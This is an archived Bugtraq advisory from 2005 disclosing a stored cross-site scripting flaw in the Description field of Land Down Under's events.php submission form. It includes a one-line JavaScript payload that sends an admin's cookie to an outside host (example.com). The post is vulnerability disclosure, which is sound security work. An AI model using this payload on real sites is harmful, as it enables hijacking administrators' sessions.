[40187] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Land Down Under 'events.php' Cross Site Scripting Vulnerability

daemon@ATHENA.MIT.EDU (conor.e.buckley@gmail.com)
Tue Sep 6 19:51:27 2005

Date: 5 Sep 2005 20:11:45 -0000
Message-ID: <20050905201145.7063.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: conor.e.buckley@gmail.com
To: bugtraq@securityfocus.com

In Land Down Under (LDU http://www.neocrome.net/), the target script "events.php?m=add" is vulnerable to XSS.

When submitting an event, the "Description" field is vulnerable to HTML injection.  Any user logged in can submit an event but an admin must approve of the event before being publicly viewed.  Using javascript, an admin's cookie can be stolen.

Exploit:
Description:
<script>document.location="http://example.com/script?cookie="+escape(document.cookie)</script>

LDU 801 and earlier are vulnerable.

--------------------------------
conor.e.buckley@gmail.com
http://quixote.at.preempted.net


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[40187] in bugtraq

Land Down Under 'events.php' Cross Site Scripting Vulnerability

daemon@ATHENA.MIT.EDU (conor.e.buckley@gmail.com)Tue Sep 6 19:51:27 2005

daemon@ATHENA.MIT.EDU (conor.e.buckley@gmail.com)
Tue Sep 6 19:51:27 2005